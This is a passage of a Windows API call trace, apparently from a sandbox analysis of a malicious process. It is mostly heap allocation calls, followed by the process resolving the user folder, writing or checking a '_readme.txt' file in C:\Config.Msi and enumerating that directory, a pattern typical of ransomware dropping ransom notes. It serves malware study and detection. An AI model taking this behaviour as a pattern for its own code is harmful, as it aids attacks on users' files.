returned 1 [0096.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.984] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.984] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.985] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.985] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.986] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.986] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.987] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.987] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.988] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.988] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.989] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.989] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0096.990] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.990] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x9b91b28 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.991] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.991] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330040 | out: hHeap=0x630000) returned 1 [0096.992] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x3330040 [0096.992] PathFindFileNameW (pszPath="C:\\Config.Msi\\") returned="Config.Msi\\" [0096.992] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0096.992] PathFindFileNameW (pszPath="") returned="" [0096.992] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75670000 [0096.993] GetProcAddress (hModule=0x75670000, lpProcName="SHGetFolderPathW") returned 0x756f5708 [0096.993] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x32faf28 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0096.993] FreeLibrary (hLibModule=0x75670000) returned 1 [0096.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330180 | out: hHeap=0x630000) returned 1 [0096.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32faf28 | out: hHeap=0x630000) returned 1 [0096.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd48 | out: hHeap=0x630000) returned 1 [0096.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd48 [0096.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x81c) returned 0x9b79750 [0096.993] PathAppendW (in: pszPath="C:\\Config.Msi\\", pMore="_readme.txt" | out: pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0096.993] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0096.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd48 | out: hHeap=0x630000) returned 1 [0096.993] PathFileExistsW (pszPath="C:\\Config.Msi\\_readme.txt") returned 1 [0096.993] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0096.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd48 [0096.994] FindFirstFileW (in: lpFileName="C:\\Config.Msi\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa174e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa174e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0096.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd48 | out: hHeap=0x630000) returned 1 [0096.994] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xa174e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa174e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0096.994] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa174e6a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa174e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa174e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0096.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fd48 [0096.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0096.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fd48 | out: hHeap=0x630000) returned 1 [0096.994] PathFindExtensionW (pszPath="C:\\Config.Msi\\_readme.txt") returned=".txt" [0096.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fb10 | out: hHeap=0x630000) returned 1 [0096.994] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa174e6a0, ftCreationTime.dwHighDateTime=0x1d5d6b4, ftLastAccessTime.dwLowDateTime=0xa174e6a0, ftLastAccessTime.dwHighDateTime=0x1d5d6b4, ftLastWriteTime.dwLowDateTime=0xa174e6a0, ftLastWriteTime.dwHighDateTime=0x1d5d6b4, nFileSizeHigh=0x0, nFileSizeLow=0x453, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0096.994] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0096.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332f8e8 | out: hHeap=0x630000) returned 1 [0096.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0096.994] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3330220 | out: hHeap=0x630000) returned 1 [0096.994] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0096.994] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fb10 [0096.994] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b78ec8 [0096.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0096.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fde0 | out: hHeap=0x630000) returned 1 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x333fde0 [0096.995] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b78ec8 [0096.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b78ec8 | out: hHeap=0x630000) returned 1 [0096.995] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333fde0 | out: hHeap=0x630000) returned 1 